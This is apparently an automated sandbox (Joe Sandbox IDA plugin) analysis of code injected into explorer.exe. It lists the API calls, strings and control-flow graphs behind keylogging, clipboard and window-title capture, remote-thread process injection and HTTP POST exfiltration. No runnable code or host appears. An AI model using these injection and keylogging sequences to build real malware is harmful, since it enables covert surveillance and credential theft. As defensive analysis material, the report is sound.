                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseFileHandleUnmapView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2381555830-0
                                                                                                                                                                • Opcode ID: fe850e4490e312c0a6ebf35e1bbec0dbac0f5a3e02e732d8146acbd1f339428e
                                                                                                                                                                • Instruction ID: 140dd3a27f513584f965a6ffcacfc2a97f9b5543de963e77fcc9919c7306e8f6
                                                                                                                                                                • Opcode Fuzzy Hash: fe850e4490e312c0a6ebf35e1bbec0dbac0f5a3e02e732d8146acbd1f339428e
                                                                                                                                                                • Instruction Fuzzy Hash: D0B0123340703097CB14E7B47C0C8DF3F28EE492213094156F10F8101047240E0386FA

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 182 ad2a09-ad2a19 GetProcessHeap RtlAllocateHeap
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000A000,00AD10BF), ref: 00AD2A0C
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00AD2A13
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1357844191-0
                                                                                                                                                                • Opcode ID: ff816bb2562cf74fbd3000a6a73b06514199d0d10df51f2e3d49d56520b8d67e
                                                                                                                                                                • Instruction ID: 4f1631ec499e05406bbb1bf93f316aa005135b57272ad3a0875701732094770c
                                                                                                                                                                • Opcode Fuzzy Hash: ff816bb2562cf74fbd3000a6a73b06514199d0d10df51f2e3d49d56520b8d67e
                                                                                                                                                                • Instruction Fuzzy Hash: 63A012B26011006BDD0497E0BD0DF053718AB40B01F0040017207C00508D7001058722

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00AD2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,00AD29F3,-00000001,00AD128C), ref: 00AD2731
                                                                                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 00AD18F4
                                                                                                                                                                • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00AD192F
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00AD19BF
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,00AD3638,00000016), ref: 00AD19E6
                                                                                                                                                                • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00AD1A0E
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00AD1A1E
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AD1A38
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00AD1A40
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1A4E
                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1A55
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00AD1A6B
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00AD1A72
                                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00AD1A88
                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00AD1AB2
                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AD1AC5
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1ACC
                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1AD3
                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00AD1AE7
                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00AD1AFE
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1B0B
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1B11
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1B17
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AD1B1A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                                • String ID: 0-FwP,Fw$atan$ntdll$opera_shared_counter
                                                                                                                                                                • API String ID: 1066286714-1020849959
                                                                                                                                                                • Opcode ID: ccf94f6b5607fe137411f10768fc2ae3dd01c66d928c616d6c89fb92a69996a8
                                                                                                                                                                • Instruction ID: 4de816a18bf1b77accd8e7ff6782e92323a9817cbf1d6ae4f27e9940f612e6ca
                                                                                                                                                                • Opcode Fuzzy Hash: ccf94f6b5607fe137411f10768fc2ae3dd01c66d928c616d6c89fb92a69996a8
                                                                                                                                                                • Instruction Fuzzy Hash: 57618D72605305BFD710DFA49C84E6BBBECEB89754F00052AF94AD3291D674DE05CBA2

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00AD27B5
                                                                                                                                                                • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00AD27CD
                                                                                                                                                                • lstrlen.KERNEL32(?,00000000), ref: 00AD27D5
                                                                                                                                                                • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00AD27E0
                                                                                                                                                                • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00AD27FA
                                                                                                                                                                • wsprintfA.USER32 ref: 00AD2811
                                                                                                                                                                • CryptDestroyHash.ADVAPI32(?), ref: 00AD282A
                                                                                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00AD2834
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                                • String ID: %02X
                                                                                                                                                                • API String ID: 3341110664-436463671
                                                                                                                                                                • Opcode ID: 931139e1728463be9e1df3082690a200723c2c54b50aeaebb0d7f81bfde92f6f
                                                                                                                                                                • Instruction ID: e1e67316a9664007b06375d3e13d806e9f9d556416248f4e54f5cd37f7b794ff
                                                                                                                                                                • Opcode Fuzzy Hash: 931139e1728463be9e1df3082690a200723c2c54b50aeaebb0d7f81bfde92f6f
                                                                                                                                                                • Instruction Fuzzy Hash: 96111972901108BFDB11DBD5EC89EAEBBBCEB48311F104066F606E2150D6714F469B61
                                                                                                                                                                APIs
                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00AD1652
                                                                                                                                                                • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 00AD167A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: KeyboardStateUnicode
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3453085656-3916222277
                                                                                                                                                                • Opcode ID: 326bf676470d72a661c49ddfb230dbd0cdc5d9a1ed9bd2b2c548ba6c789a3157
                                                                                                                                                                • Instruction ID: 45c107532b26b707f0087c68535d1c604da2ab910d1dc7ad393c4c7c8462bce3
                                                                                                                                                                • Opcode Fuzzy Hash: 326bf676470d72a661c49ddfb230dbd0cdc5d9a1ed9bd2b2c548ba6c789a3157
                                                                                                                                                                • Instruction Fuzzy Hash: CF01803290121ABBDF34CB55DD45BFB73BCAF45B00F08441BE903E2251D730EA459AA2

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • RtlZeroMemory.NTDLL(00AD5013,0000001C), ref: 00AD13C8
                                                                                                                                                                • VirtualQuery.KERNEL32(00AD13AE,?,0000001C), ref: 00AD13DA
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00AD140B
                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000004), ref: 00AD141C
                                                                                                                                                                • wsprintfA.USER32 ref: 00AD1433
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00AD1448
                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AD144E
                                                                                                                                                                • RtlInitializeCriticalSection.NTDLL(00AD582C), ref: 00AD1465
                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 00AD1489
                                                                                                                                                                • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 00AD14A6
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00AD14AF
                                                                                                                                                                • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 00AD14D0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00AD14D3
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00AD14F1
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 00AD150D
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AD1514
                                                                                                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 00AD152A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                                                                                                • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                                                                                                • API String ID: 3628807430-1779906909
                                                                                                                                                                • Opcode ID: 4e87b1ac48e819e3636f94e514d958592bf89ba4f8649b184ba52e94d652c8d7
                                                                                                                                                                • Instruction ID: 40fb575c5df861302a473e2568aeab21557fc69a5fe085fdb050e00e028816a1
                                                                                                                                                                • Opcode Fuzzy Hash: 4e87b1ac48e819e3636f94e514d958592bf89ba4f8649b184ba52e94d652c8d7
                                                                                                                                                                • Instruction Fuzzy Hash: 9B41A2B1A01304BFDB10EBB5ED19E6E3BA9FB94751B00442BF50786391DB759902CBA2

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(00AD582C), ref: 00AD16C4
                                                                                                                                                                • lstrlenW.KERNEL32 ref: 00AD16DB
                                                                                                                                                                • lstrlenW.KERNEL32 ref: 00AD16F3
                                                                                                                                                                • wsprintfW.USER32 ref: 00AD1743
                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00AD174E
                                                                                                                                                                • GetWindowTextW.USER32(00000000,00AD5850,00000800), ref: 00AD1767
                                                                                                                                                                • GetClassNameW.USER32(00000000,00AD5850,00000800), ref: 00AD1774
                                                                                                                                                                • lstrcmpW.KERNEL32(00AD5020,00AD5850), ref: 00AD1781
                                                                                                                                                                • lstrcpyW.KERNEL32(00AD5020,00AD5850), ref: 00AD178D
                                                                                                                                                                • wsprintfW.USER32 ref: 00AD17AD
                                                                                                                                                                • lstrcatW.KERNEL32 ref: 00AD17C6
                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(00AD582C), ref: 00AD17D3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                                                                                                • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                                                                                                                • API String ID: 2651329914-3371406555
                                                                                                                                                                • Opcode ID: 974c750f3f8bc861e043576c9601ba69492cbb39801c426f8d6f77871a794835
                                                                                                                                                                • Instruction ID: 21ee5494c31438ab744d23c67604ca3e6bbaaa12444ce9cdc4682bbfa570b362
                                                                                                                                                                • Opcode Fuzzy Hash: 974c750f3f8bc861e043576c9601ba69492cbb39801c426f8d6f77871a794835
                                                                                                                                                                • Instruction Fuzzy Hash: 6521D636902614BFDB20ABB5FC89E2F3B69FB41B557044027F40392371DA218E03DBA2

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00AD2603
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00AD260B
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00AD261B
                                                                                                                                                                • Thread32First.KERNEL32(00000000,0000001C), ref: 00AD2629
                                                                                                                                                                • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00AD2648
                                                                                                                                                                • SuspendThread.KERNEL32(00000000), ref: 00AD2658
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AD2667
                                                                                                                                                                • Thread32Next.KERNEL32(00000000,0000001C), ref: 00AD2677
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AD2682
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1467098526-0
                                                                                                                                                                • Opcode ID: 3be5ba4c3db29011d4e5797c08115e0d867728b0a2d6416401e04dd48dc5ba0d
                                                                                                                                                                • Instruction ID: 809f47a19ae601f42556b847c9b3818abc0130ba44c01573b3c1a0050443b934
                                                                                                                                                                • Opcode Fuzzy Hash: 3be5ba4c3db29011d4e5797c08115e0d867728b0a2d6416401e04dd48dc5ba0d
                                                                                                                                                                • Instruction Fuzzy Hash: 93112A72406300EBDB11DFA0AC48B6ABBB4EB95711F04446BFA4792250D7348A4ACBA7

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 295 ad20a1-ad20fc call ad240f call ad2a09 call ad298a call ad24cc 304 ad20fe-ad2115 295->304 305 ad2117-ad2123 295->305 308 ad2127-ad2129 304->308 305->308 309 ad23fd-ad240c call ad29eb 308->309 310 ad212f-ad2166 RtlZeroMemory 308->310 314 ad216c-ad2187 310->314 315 ad23f5-ad23fc 310->315 316 ad21b9-ad21cb 314->316 317 ad2189-ad219a call ad243d 314->317 315->309 322 ad21cf-ad21d1 316->322 323 ad21ad 317->323 324 ad219c-ad21ab 317->324 326 ad21d7-ad2233 call ad288d 322->326 327 ad23e2-ad23e8 322->327 325 ad21af-ad21b7 323->325 324->325 325->322 335 ad2239-ad223e 326->335 336 ad23db 326->336 328 ad23ea-ad23ec call ad29eb 327->328 329 ad23f1 327->329 328->329 329->315 337 ad2258-ad2286 call ad2a09 wsprintfW 335->337 338 ad2240-ad2251 335->338 336->327 341 ad229f-ad22b6 337->341 342 ad2288-ad228a 337->342 338->337 348 ad22b8-ad22ee call ad2a09 wsprintfW 341->348 349 ad22f5-ad230f 341->349 343 ad228b-ad228e 342->343 344 ad2299-ad229b 343->344 345 ad2290-ad2295 343->345 344->341 345->343 347 ad2297 345->347 347->341 348->349 353 ad23b8-ad23ce call ad29eb 349->353 354 ad2315-ad2328 349->354 362 ad23d7 353->362 363 ad23d0-ad23d2 call ad29eb 353->363 354->353 357 ad232e-ad2344 call ad2a09 354->357 364 ad2346-ad2351 357->364 362->336 363->362 366 ad2365-ad237c 364->366 367 ad2353-ad2360 call ad29ce 364->367 371 ad237e 366->371 372 ad2380-ad238d 366->372 367->366 371->372 372->364 373 ad238f-ad2393 372->373 374 ad23ad-ad23b4 call ad29eb 373->374 375 ad2395 373->375 374->353 376 ad2395 call ad29bd 375->376 378 ad239a-ad23a7 RtlMoveMemory 376->378 378->374
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00AD2A09: GetProcessHeap.KERNEL32(00000008,0000A000,00AD10BF), ref: 00AD2A0C
                                                                                                                                                                  • Part of subcall function 00AD2A09: RtlAllocateHeap.NTDLL(00000000), ref: 00AD2A13
                                                                                                                                                                  • Part of subcall function 00AD298A: lstrlen.KERNEL32(00AD4FE2,?,00000000,00000000,00AD20DD,75568A60,00AD4FE2,00000000), ref: 00AD2992
                                                                                                                                                                  • Part of subcall function 00AD298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00AD4FE2,00000001,00000000,00000000), ref: 00AD29A4
                                                                                                                                                                  • Part of subcall function 00AD24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 00AD24DE
                                                                                                                                                                • RtlZeroMemory.NTDLL(?,0000003C), ref: 00AD2139
                                                                                                                                                                • wsprintfW.USER32 ref: 00AD2272
                                                                                                                                                                • wsprintfW.USER32 ref: 00AD22DD
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00AD23A7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                                • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                                                • API String ID: 4204651544-1701262698
                                                                                                                                                                • Opcode ID: 904a610866e3abe835ea2867a9fc57c64b71aee06209025f0886e241337df0a1
                                                                                                                                                                • Instruction ID: 2b4b51aca24f34c74a5105e413acb9b590b4bae86628b5f7be7be572d9881235
                                                                                                                                                                • Opcode Fuzzy Hash: 904a610866e3abe835ea2867a9fc57c64b71aee06209025f0886e241337df0a1
                                                                                                                                                                • Instruction Fuzzy Hash: A6A15A71609341AFDB10DFA8D984A6BBBE8FF98740F00092EF986D7351DA74DA05CB52

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 380 ad12ae-ad12bf 381 ad12c5-ad12c7 380->381 382 ad13a6-ad13ad 380->382 381->382 383 ad12cd-ad12cf 381->383 384 ad12d4 call ad29bd 383->384 385 ad12d9-ad12fc lstrlen call ad2a09 384->385 388 ad136e-ad1377 call ad29eb 385->388 389 ad12fe-ad1327 call ad2841 RtlZeroMemory 385->389 394 ad139d-ad13a5 call ad29ae 388->394 395 ad1379-ad137d 388->395 396 ad1329-ad134f RtlMoveMemory call ad2569 389->396 397 ad1353-ad1369 RtlMoveMemory call ad2569 389->397 394->382 399 ad137f-ad1392 call ad255c PathMatchSpecA 395->399 396->389 406 ad1351 396->406 397->388 407 ad139b 399->407 408 ad1394-ad1397 399->408 406->388 407->394 408->399 409 ad1399 408->409 409->394
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00AD29BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,00AD12D9,00000000,00000000,?,00000001), ref: 00AD29C7
                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 00AD12DC
                                                                                                                                                                  • Part of subcall function 00AD2A09: GetProcessHeap.KERNEL32(00000008,0000A000,00AD10BF), ref: 00AD2A0C
                                                                                                                                                                  • Part of subcall function 00AD2A09: RtlAllocateHeap.NTDLL(00000000), ref: 00AD2A13
                                                                                                                                                                • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00AD138A
                                                                                                                                                                  • Part of subcall function 00AD2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00AD1119,00000001), ref: 00AD2850
                                                                                                                                                                  • Part of subcall function 00AD2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00AD1119,00000001), ref: 00AD2855
                                                                                                                                                                • RtlZeroMemory.NTDLL(00000000,00000104), ref: 00AD1316
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00AD1332
                                                                                                                                                                  • Part of subcall function 00AD2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00AD136E), ref: 00AD2591
                                                                                                                                                                  • Part of subcall function 00AD2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 00AD259A
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00AD135F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2993730741-0
                                                                                                                                                                • Opcode ID: 17fc1031f4adaf869b650120cd6c4a8a368eedff9bc2f3a800e6a6732a0f2433
                                                                                                                                                                • Instruction ID: 6c3ccadfb3c940531d285ff5e4767449fdb8b2c2fed62d1d6e63455bdbe7f4ee
                                                                                                                                                                • Opcode Fuzzy Hash: 17fc1031f4adaf869b650120cd6c4a8a368eedff9bc2f3a800e6a6732a0f2433
                                                                                                                                                                • Instruction Fuzzy Hash: 3C21AB71704202AFC744EF689955A7EB7EAAB94700B10092FF853D7342DB34DD0A8BA2

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 410 ad1581-ad1592 412 ad1598-ad159b 410->412 413 ad1624-ad1628 410->413 414 ad159d-ad15a0 412->414 415 ad15a7-ad15b3 GlobalLock 412->415 414->415 416 ad15a2-ad15a5 414->416 417 ad15b5-ad15b9 415->417 418 ad1623 415->418 416->413 416->415 419 ad15e9 417->419 420 ad15bb-ad15be 417->420 418->413 423 ad15eb-ad15f2 call ad293e 419->423 421 ad15e4-ad15e7 420->421 422 ad15c0-ad15c3 420->422 421->423 424 ad15c5-ad15e2 lstrlenW call ad2a09 lstrcatW 422->424 425 ad15f4-ad15fd call ad2724 422->425 423->425 424->425 432 ad15ff-ad1608 lstrlenW 425->432 433 ad161b-ad1622 GlobalUnlock 425->433 432->433 434 ad160a-ad160e 432->434 433->418 435 ad160f call ad16b9 434->435 436 ad1614-ad1616 call ad29eb 435->436 436->433
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00AD15A9
                                                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 00AD15C6
                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 00AD15DC
                                                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 00AD1600
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00AD161C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1114890469-0
                                                                                                                                                                • Opcode ID: 43cf801dc0d8a14000e39b151e1a2863d4ea69955ef3cf7127cea576988ed717
                                                                                                                                                                • Instruction ID: f5661cefa35b44c177039d2554237e830f15fcaf52f1779bf35793730cab34a7
                                                                                                                                                                • Opcode Fuzzy Hash: 43cf801dc0d8a14000e39b151e1a2863d4ea69955ef3cf7127cea576988ed717
                                                                                                                                                                • Instruction Fuzzy Hash: 3E018436A051117B9A25A7B97E986BE73AEEFD67157084037F80793312DE29CD038351

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 438 ad1bbd-ad1bd2 439 ad1bd4 438->439 440 ad1c06-ad1c0e 438->440 441 ad1bd6-ad1c04 RtlMoveMemory 439->441 442 ad1c69-ad1c71 440->442 443 ad1c10-ad1c15 440->443 441->440 441->441 445 ad1cb1 442->445 446 ad1c73-ad1c85 442->446 444 ad1c64-ad1c67 443->444 444->442 448 ad1c17-ad1c2a LoadLibraryA 444->448 447 ad1cb3-ad1cb8 445->447 446->445 449 ad1c87-ad1ca4 LdrProcessRelocationBlock 446->449 450 ad1cbb-ad1cbd 448->450 451 ad1c30-ad1c35 448->451 449->445 452 ad1ca6-ad1caa 449->452 450->447 453 ad1c5c-ad1c5f 451->453 452->445 454 ad1cac-ad1caf 452->454 455 ad1c37-ad1c3b 453->455 456 ad1c61 453->456 454->445 454->449 457 ad1c3d-ad1c40 455->457 458 ad1c42-ad1c45 455->458 456->444 459 ad1c47-ad1c51 GetProcAddress 457->459 458->459 459->450 460 ad1c53-ad1c59 459->460 460->453
                                                                                                                                                                APIs
                                                                                                                                                                • RtlMoveMemory.NTDLL(?,?,?), ref: 00AD1BF4
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,00AD5848,00000000,00000000,75572EE0,00000000,00AD19B6,?,?,?,00000001,?,00000000), ref: 00AD1C1C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00AD1C49
                                                                                                                                                                • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00AD1C9A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3827878703-0
                                                                                                                                                                • Opcode ID: fd56321ac0c084ae7d41c47e5618daa107e64d018b22484870ce74b644faa369
                                                                                                                                                                • Instruction ID: 0fb5645f990e56b8e18fe6059ad589a9f6999ec9b8fb00bddc08baede41eca58
                                                                                                                                                                • Opcode Fuzzy Hash: fd56321ac0c084ae7d41c47e5618daa107e64d018b22484870ce74b644faa369
                                                                                                                                                                • Instruction Fuzzy Hash: 81318E72750616BFCB18CF29C9C4B66B7A8BF15315B14452EE857C7300D731E846CBA0
                                                                                                                                                                APIs
